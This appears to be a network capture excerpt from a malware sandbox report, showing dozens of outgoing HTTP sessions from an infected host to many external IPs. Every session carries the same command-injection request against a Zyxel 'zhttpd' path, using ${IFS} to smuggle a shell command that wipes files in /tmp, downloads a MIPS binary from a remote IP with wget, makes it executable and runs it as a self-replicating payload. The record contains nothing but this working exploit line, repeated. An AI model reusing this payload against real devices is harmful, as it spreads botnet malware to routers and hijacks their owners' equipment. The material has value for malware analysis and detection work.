                                      Jan 14, 2024 15:50:32.980067968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      950192.168.2.144455431.41.4.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980123043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      951192.168.2.1446634112.233.23.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980149984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      952192.168.2.1457758130.244.112.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980182886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      953192.168.2.1439514219.150.100.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980221033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      954192.168.2.1451396178.128.15.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980254889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      955192.168.2.1457276102.66.244.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980288029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      956192.168.2.1449064147.236.175.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980331898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      957192.168.2.144699439.212.173.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980374098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      958192.168.2.14445104.148.152.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980413914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      959192.168.2.145031262.86.13.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980433941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      960192.168.2.1440536120.19.133.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980473995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      961192.168.2.1459326145.244.140.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980499029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      962192.168.2.1439032159.204.102.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980556011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      963192.168.2.1456614158.120.232.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980598927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      964192.168.2.1434382163.253.136.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980639935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      965192.168.2.14592388.173.159.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980664968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      966192.168.2.1453166141.174.3.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980696917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      967192.168.2.1448302144.249.97.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980747938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      968192.168.2.1460004104.55.86.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980798006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      969192.168.2.143462094.158.128.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980834007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      970192.168.2.14352005.95.30.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980861902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      971192.168.2.143926260.168.72.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980885983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      972192.168.2.1448040112.241.25.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980915070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      973192.168.2.145538048.44.181.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980956078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      974192.168.2.144494292.232.21.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980977058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      975192.168.2.143458035.158.42.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981020927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      976192.168.2.143643032.153.16.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981070995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      977192.168.2.1448172115.223.195.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981086969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      978192.168.2.1460532158.47.83.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981122017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      979192.168.2.1452794204.122.249.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981159925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      980192.168.2.1447576155.177.19.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981225967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      981192.168.2.145109282.86.219.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981267929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      982192.168.2.1437050144.148.98.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981306076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      983192.168.2.144781698.108.249.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981350899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      984192.168.2.1450562178.203.226.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981381893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      985192.168.2.1445190137.29.253.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981410980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      986192.168.2.144315841.246.111.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981456995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      987192.168.2.1458582221.147.13.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981513023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      988192.168.2.145586071.28.238.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981540918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      989192.168.2.145264267.61.22.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981578112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      990192.168.2.144047888.152.123.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981617928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      991192.168.2.145483472.69.168.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981674910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      992192.168.2.1433684135.46.178.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981723070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      993192.168.2.144447895.188.14.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981756926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      994192.168.2.1449382140.205.22.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981794119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      995192.168.2.145815498.118.147.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981822014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      996192.168.2.145534619.84.133.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981859922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      997192.168.2.145432480.60.105.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981910944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      998192.168.2.1452144152.153.218.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981962919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      999192.168.2.1455682162.58.143.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.981985092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1000192.168.2.143307073.137.138.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.982050896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1001192.168.2.144347812.137.87.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.982076883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1002192.168.2.1449888166.135.10.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.982136011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1003192.168.2.14365689.47.238.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.982161045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1004192.168.2.143772896.225.226.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.982214928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1005192.168.2.1436770222.140.230.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.982250929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1006192.168.2.144340493.45.75.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.982276917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1007192.168.2.145741675.85.165.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.982311010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1008192.168.2.145675425.171.218.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.982347012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1009192.168.2.144390090.15.206.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.982378006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1010192.168.2.1441958157.127.29.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.982414961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1011192.168.2.1433550199.162.131.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.982475042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1012192.168.2.1441230185.41.191.209443
                                      TimestampBytes transferredDirectionData
